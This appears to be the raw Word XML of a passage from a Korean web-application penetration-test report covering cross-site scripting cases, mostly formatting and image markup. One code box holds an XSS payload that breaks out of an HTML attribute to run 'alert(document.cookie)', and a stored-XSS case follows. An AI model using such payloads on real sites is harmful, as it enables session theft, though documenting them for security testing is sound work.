      <w:bookmarkStart w:id="357" w:name="_Toc206630525"/>
      <w:bookmarkStart w:id="358" w:name="_Toc209094601"/>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28</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>삽입되는 부분을 우회하기 위한 공격 구문 삽입</w:t>
      </w:r>
      <w:bookmarkEnd w:id="356"/>
      <w:bookmarkEnd w:id="357"/>
      <w:bookmarkEnd w:id="358"/>
    </w:p>
    <w:p w14:paraId="07FC4217" w14:textId="73802453" w:rsidR="00C40C72" w:rsidRDefault="00C40C72" w:rsidP="00AA5BEB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="004251C0" w:rsidRPr="0082249C" w14:paraId="6FAC65A7" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="626C4BFF" w14:textId="22C15D7E" w:rsidR="004251C0" w:rsidRPr="004251C0" w:rsidRDefault="00C07311" w:rsidP="004251C0">
            <w:r w:rsidRPr="004251C0">
              <w:t>"/&gt;&lt;script&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="003F0C6A">
              <w:t>alert(document.cookie);</w:t>
            </w:r>
            <w:r w:rsidRPr="004251C0">
              <w:t>&lt;/script&gt;&lt;input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="004251C0">
              <w:t>type="hidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EFF73A8" w14:textId="30054C3B" w:rsidR="00CA3FF0" w:rsidRDefault="004251C0" w:rsidP="00CA3FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="_Toc206630388"/>
      <w:bookmarkStart w:id="360" w:name="_Toc206630526"/>
      <w:bookmarkStart w:id="361" w:name="_Toc206631717"/>
      <w:bookmarkStart w:id="362" w:name="_Toc206631766"/>
      <w:bookmarkStart w:id="363" w:name="_Ref206631828"/>
      <w:bookmarkStart w:id="364" w:name="_Toc209094673"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[코드</w:t>
      </w:r>
      <w:r>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3</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006A2123">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006A2123">
        <w:instrText xml:space="preserve"> TC "</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="365" w:name="_Toc206631001"/>
      <w:r w:rsidR="006A2123" w:rsidRPr="00C92736">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>[코드</w:instrText>
      </w:r>
      <w:r w:rsidR="006A2123" w:rsidRPr="00C92736">
        <w:instrText xml:space="preserve">] </w:instrText>
      </w:r>
      <w:r w:rsidR="006A2123" w:rsidRPr="00C92736">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText>2</w:instrText>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
      <w:r w:rsidR="006A2123">
        <w:instrText xml:space="preserve">" \f A \l "1" </w:instrText>
      </w:r>
      <w:r w:rsidR="006A2123">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="366" w:name="_Toc206631853"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00670356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">우회 </w:t>
      </w:r>
      <w:r w:rsidR="00CE7C48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00CE7C48">
        <w:t xml:space="preserve">TML </w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
      <w:bookmarkEnd w:id="360"/>
      <w:bookmarkEnd w:id="361"/>
      <w:bookmarkEnd w:id="362"/>
      <w:bookmarkEnd w:id="363"/>
      <w:bookmarkEnd w:id="366"/>
      <w:r w:rsidR="009B1230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트 태그</w:t>
      </w:r>
      <w:bookmarkEnd w:id="364"/>
    </w:p>
    <w:p w14:paraId="5519953A" w14:textId="517EC502" w:rsidR="00CA3FF0" w:rsidRDefault="00CA3FF0" w:rsidP="00CA3FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716E2F9C" w14:textId="167B3E83" w:rsidR="00CA3FF0" w:rsidRDefault="00887FAD" w:rsidP="00CA3FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251922432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1119DC1E" wp14:editId="477F82D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2123090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>693420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="899886" cy="167640"/>
                <wp:effectExtent l="0" t="0" r="14605" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="1885282446" name="직사각형 1885282446"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="899886"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823D1" id="직사각형 1885282446" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:167.15pt;margin-top:54.6pt;width:70.85pt;height:13.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yhhQIAANwEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdJMoTTdRkypqFYRU&#10;tZVS1LPj9WZX8h+2k025lXdA4g24cOC5UHkHPns3bSicEDk4M54/zzff7OnZTkmyFc7XRk9p/6hH&#10;idDcFLVeT+n728WbnBIfmC6YNFpM6b3w9Gz2+tVpYydiYCojC+EIkmg/aeyUViHYSZZ5XgnF/JGx&#10;QsNYGqdYgOrWWeFYg+xKZoNeb5Q1xhXWGS68x+1Fa6SzlL8sBQ/XZelFIHJK8baQTpfOVTyz2Smb&#10;rB2zVc27Z7B/eIVitUbRp1QXLDCycfUfqVTNnfGmDEfcqMyUZc1F6gHd9HsvullWzIrUC8Dx9gkm&#10;///S8qvtjSN1gdnl+fEgHwyHI0o0U5jV49eHx0/ffnx/+PnlMzkwA7PG+glCl/bGdZqHGAHYlU7F&#10;f7RGdgnn+yecxS4Qjst8PM5zlOEw9Ucno2GaQ/YcbJ0Pb4VRJApT6jDGhC7bXvqAgnDdu8Ra2ixq&#10;KdMopSYNko57x5g2Z2BUKVmAqCx69HpNCZNrUJUHl1J6I+sihsdE3q1X59KRLQNdFosefpEhKPeb&#10;W6x9wXzV+iVTSyRVB7BZ1go9xuB9tNQxu0h87DqICLaYRWllinvMwZmWoN7yRY0il8yHG+bASHSD&#10;LQvXOEpp0KLpJEoq4z7+7T76gyiwUtKA4Wj/w4Y5QYl8p0GhcX8I4ElIyvD4ZADFHVpWhxa9UecG&#10;qPSxz5YnMfoHuRdLZ9QdlnEeq8LENEftFuhOOQ/t5mGduZjPkxvWwLJwqZeWx+QRpwjv7e6OOdvN&#10;P4A4V2a/DWzyggatb0uE+SaYsk4cecYVE4wKVijNslv3uKOHevJ6/ijNfgEAAP//AwBQSwMEFAAG&#10;AAgAAAAhAKgccLDgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyog1OS&#10;EuJUgIQQFQdoy92N3SSqvY5iNwl/z3KC4848zc6U69lZNpohdB4l3C4SYAZrrztsJOx3LzcrYCEq&#10;1Mp6NBK+TYB1dXlRqkL7CT/NuI0NoxAMhZLQxtgXnIe6NU6Fhe8Nknf0g1ORzqHhelAThTvLRZJk&#10;3KkO6UOrevPcmvq0PTsJH/505PZLiE3+9CryN7eamvFdyuur+fEBWDRz/IPhtz5Vh4o6HfwZdWBW&#10;QpouU0LJSO4FMCKWeUbrDqSkdxnwquT/N1Q/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAA&#10;AOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAh&#10;ADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAh&#10;AC29/KGFAgAA3AQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgA&#10;AAAhAKgccLDgAAAACwEAAA8AAAAAAAAAAAAAAAAA3wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAA&#10;BAAEAPMAAADsBQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D62374" w:rsidRPr="00EB7AAD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0344E8D0" wp14:editId="01CA3584">
            <wp:extent cx="4571190" cy="1481504"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="23495"/>
            <wp:docPr id="1825502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850" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId43"/>
                    <a:srcRect t="1" b="63085"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="14817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07A84" w14:textId="718F5C3C" w:rsidR="00CA3FF0" w:rsidRDefault="00CA3FF0" w:rsidP="00CA3FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="367" w:name="_Toc206630390"/>
      <w:bookmarkStart w:id="368" w:name="_Toc206630528"/>
      <w:bookmarkStart w:id="369" w:name="_Toc209094602"/>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29</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트</w:t>
      </w:r>
      <w:r w:rsidR="009B1230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 태그</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 작동 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="367"/>
      <w:bookmarkEnd w:id="368"/>
      <w:bookmarkEnd w:id="369"/>
    </w:p>
    <w:p w14:paraId="061F910B" w14:textId="5E1606CF" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB5BB9" w14:textId="61DB2323" w:rsidR="007C5B08" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00557661">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00557661">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3131">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tored </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>크로스사이트 스크립팅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFABE38" w14:textId="0CE25F13" w:rsidR="007C5B08" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251524096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35750B7E" wp14:editId="4573B529">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1974850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>640080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="906780" cy="2872740"/>
                <wp:effectExtent l="0" t="0" r="26670" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="601" name="직사각형 601"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="906780" cy="28727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B8955" id="직사각형 601" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:155.5pt;margin-top:50.4pt;width:71.4pt;height:226.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pkgAIAAM8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1OGzEQvlfqO1i+l91EQELEBkWgVJUQ&#10;IEHF2fF6E0v+q+1kQ2/0HSr1DXrpoc9V0XfoZ+8GKO2pag7OjGc84+/zN3t8stWKbIQP0pqKDvZK&#10;SoThtpZmWdH3N/M3Y0pCZKZmyhpR0TsR6Mn09avj1k3E0K6sqoUnKGLCpHUVXcXoJkUR+EpoFvas&#10;EwbBxnrNIly/LGrPWlTXqhiW5WHRWl87b7kIAbtnXZBOc/2mETxeNk0QkaiK4m4xrz6vi7QW02M2&#10;WXrmVpL312D/cAvNpEHTx1JnLDKy9vKPUlpyb4Nt4h63urBNI7nIGIBmUL5Ac71iTmQsICe4R5rC&#10;/yvLLzZXnsi6ooflgBLDNB7p4ev9w6dvP77f//zymaR9sNS6MEHytbvyvRdgJsjbxuv0DzBkm5m9&#10;e2RWbCPh2DwqD0dj8M8RGo5Hw9F+pr54Ou18iG+F1SQZFfV4uUwo25yHiI5I3aWkZsbOpVL59ZQh&#10;LaR3VB6kBgwiahSLMLUDrGCWlDC1hDp59LlksErW6XgqFPxycao82TAoZD4v8Utw0e63tNT7jIVV&#10;l5dDnXa0jBCwkrqi43R4d1qZVF1kCfYIEoUdacla2PoO1HvbaTI4Ppdocs5CvGIeIgQaDFa8xNIo&#10;C4i2tyhZWf/xb/spH9pAlJIWogb8D2vmBSXqnYFqjgb7IJ7E7OwfjIZw/PPI4nnErPWpBSvQBW6X&#10;zZQf1c5svNW3mL9Z6ooQMxy9O6J75zR2w4YJ5mI2y2lQvmPx3Fw7noonnhK9N9tb5l3//hHKubC7&#10;AWCTFzLocjshzNbRNjJr5IlXvGByMDX5LfsJT2P53M9ZT9+h6S8AAAD//wMAUEsDBBQABgAIAAAA&#10;IQCcWKvm3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqB2H0CrEqQAJ&#10;IRAHKHB3YzeJaq+j2E3C37Oc4LajGc3Oq7aLd2yyY+wDKshWApjFJpgeWwWfH49XG2AxaTTaBbQK&#10;vm2EbX1+VunShBnf7bRLLaMSjKVW0KU0lJzHprNex1UYLJJ3CKPXieTYcjPqmcq941KIG+51j/Sh&#10;04N96Gxz3J28grdwPHD3JeXL+v5Jrp/9Zm6nV6UuL5a7W2DJLukvDL/zaTrUtGkfTmgicwryLCOW&#10;RIYQxECJ6yKnY6+gKHIJvK74f4b6BwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACIaGmSA&#10;AgAAzwQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAJxY&#10;q+bfAAAACwEAAA8AAAAAAAAAAAAAAAAA2gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AADmBQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000746BA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63661B84" wp14:editId="02F9C62F">
            <wp:extent cx="4572000" cy="3577403"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="23495"/>
            <wp:docPr id="610" name="그림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25" r="1778" b="18056"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="35774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60477B" w14:textId="1E5811EB" w:rsidR="007C5B08" w:rsidRPr="00232CBC" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="370" w:name="_Toc209094603"/>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>그림</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림] \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">메인에서 </w:t>
      </w:r>
      <w:r w:rsidR="000746BA" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>상품 클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p w14:paraId="16497BC4" w14:textId="77777777" w:rsidR="00062DEE" w:rsidRDefault="00062DEE" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AD024D" w14:textId="18812B1D" w:rsidR="00062DEE" w:rsidRDefault="00431EB7" w:rsidP="00062DEE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251498496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="239A8C06" wp14:editId="4334ACDA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5109210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1212850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="320040" cy="167640"/>
                <wp:effectExtent l="0" t="0" r="22860" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="614" name="직사각형 614"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="320040"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26F3A" id="직사각형 614" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:402.3pt;margin-top:95.5pt;width:25.2pt;height:13.2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KfAIAAM4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1OGzEQvlfqO1i+l01oCLDKBkWgVJUQ&#10;IEHFeeK1s5b8V9vJht7oO1TiDXrpoc9V0Xfo2LuBlPZUNQdn/sfz+ZudnGy0Imvug7SmosO9ASXc&#10;MFtLs6zoh5v5myNKQgRTg7KGV/SOB3oyff1q0rqS79vGqpp7gkVMKFtX0SZGVxZFYA3XEPas4wad&#10;wnoNEVW/LGoPLVbXqtgfDMZFa33tvGU8BLSedU46zfWF4CxeChF4JKqieLeYT5/PRTqL6QTKpQfX&#10;SNZfA/7hFhqkwaZPpc4gAll5+UcpLZm3wYq4x6wurBCS8TwDTjMcvJjmugHH8ywITnBPMIX/V5Zd&#10;rK88kXVFx8MRJQY0PtLj1/vHz99+fL//+fCFJDui1LpQYvC1u/K9FlBMI2+E1+kfhyGbjOzdE7J8&#10;EwlD41t8qxHiz9A1HB+OUcYqxXOy8yG+41aTJFTU48NlPGF9HmIXug1JvYydS6XQDqUypMWix4OD&#10;VB+QQ0JBRFE7nCqYJSWglkhOFn0uGaySdUpP2cEvF6fKkzUgQebzAf76m/0WlnqfQWi6uOxKYVBq&#10;GZG/SuqKHqXkbbYyycszA/sJEoIdZkla2PoOkfe2o2RwbC6xyTmEeAUeOYjT4F7FSzyEsjii7SVK&#10;Gus//c2e4pEa6KWkRU7j+B9X4Dkl6r1B0hwPR+kRYlZGB4f7qPhdz2LXY1b61CIqQ9xgx7KY4qPa&#10;isJbfYvrN0td0QWGYe8O6F45jd2u4QIzPpvlMCS+g3hurh1LxRNOCd6bzS14179/ROJc2C3/oXxB&#10;gy42ZRo7W0UrZObIM67IraTg0mSW9QuetnJXz1HPn6HpLwAAAP//AwBQSwMEFAAGAAgAAAAhAAPa&#10;T47gAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyoE6tt0hCnAiSEQD1A&#10;KXc33iZR/RPFbhLenuUEtx3Np9mZcjtbw0YcQuedhHSRAENXe925RsLh8/kuBxaicloZ71DCNwbY&#10;VtdXpSq0n9wHjvvYMApxoVAS2hj7gvNQt2hVWPgeHXknP1gVSQ4N14OaKNwaLpJkza3qHH1oVY9P&#10;Ldbn/cVKePfnEzdfQrxljy8ie7X51Iw7KW9v5od7YBHn+AfDb32qDhV1OvqL04EZCXmyXBNKxial&#10;UUTkqxUdRwkizZbAq5L/31D9AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAG/59wp8AgAA&#10;zgQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAAPaT47g&#10;AAAACwEAAA8AAAAAAAAAAAAAAAAA1gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00062DEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F44862D" wp14:editId="56D7EE61">
            <wp:extent cx="4571365" cy="1572684"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="27940"/>
            <wp:docPr id="612" name="그림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092" b="26325"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1572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3E0B4D" w14:textId="68E7F2C8" w:rsidR="00062DEE" w:rsidRPr="00334326" w:rsidRDefault="00062DEE" w:rsidP="00062DEE">
      <w:pPr>
